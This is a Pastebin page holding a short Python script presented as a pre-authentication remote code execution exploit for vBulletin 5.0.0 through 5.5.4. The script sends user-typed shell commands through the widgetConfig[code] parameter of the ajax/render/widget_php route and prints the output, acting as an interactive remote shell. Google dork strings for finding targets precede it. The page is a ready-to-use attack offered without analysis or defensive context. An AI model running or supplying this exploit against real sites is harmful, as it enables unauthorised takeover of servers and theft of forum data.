API tools faq
paste
Advertisement
m0rkus

vBulletin 5.x 0day pre-auth RCE exploit

m0rkus
Sep 24th, 2019
860
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.83 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. # vBulletin 5.x 0day pre-auth RCE exploit
  4. #
  5. # This should work on all versions from 5.0.0 till 5.5.4
  6. #
  7. # Google Dorks:
  8. # - site:*.vbulletin.net
  9. # - "Powered by vBulletin Version 5.5.4"
  10.  
  11. import requests
  12. import sys
  13.  
  14. if len(sys.argv) != 2:
  15. sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
  16.  
  17. params = {"routestring":"ajax/render/widget_php"}
  18.  
  19. while True:
  20. try:
  21. cmd = raw_input("vBulletin$ ")
  22. params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
  23. r = requests.post(url = sys.argv[1], data = params)
  24. if r.status_code == 200:
  25. print r.text
  26. else:
  27. sys.exit("Exploit failed! :(")
  28. except KeyboardInterrupt:
  29. sys.exit("\nClosing shell...")
  30. except Exception, e:
  31. sys.exit(str(e))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!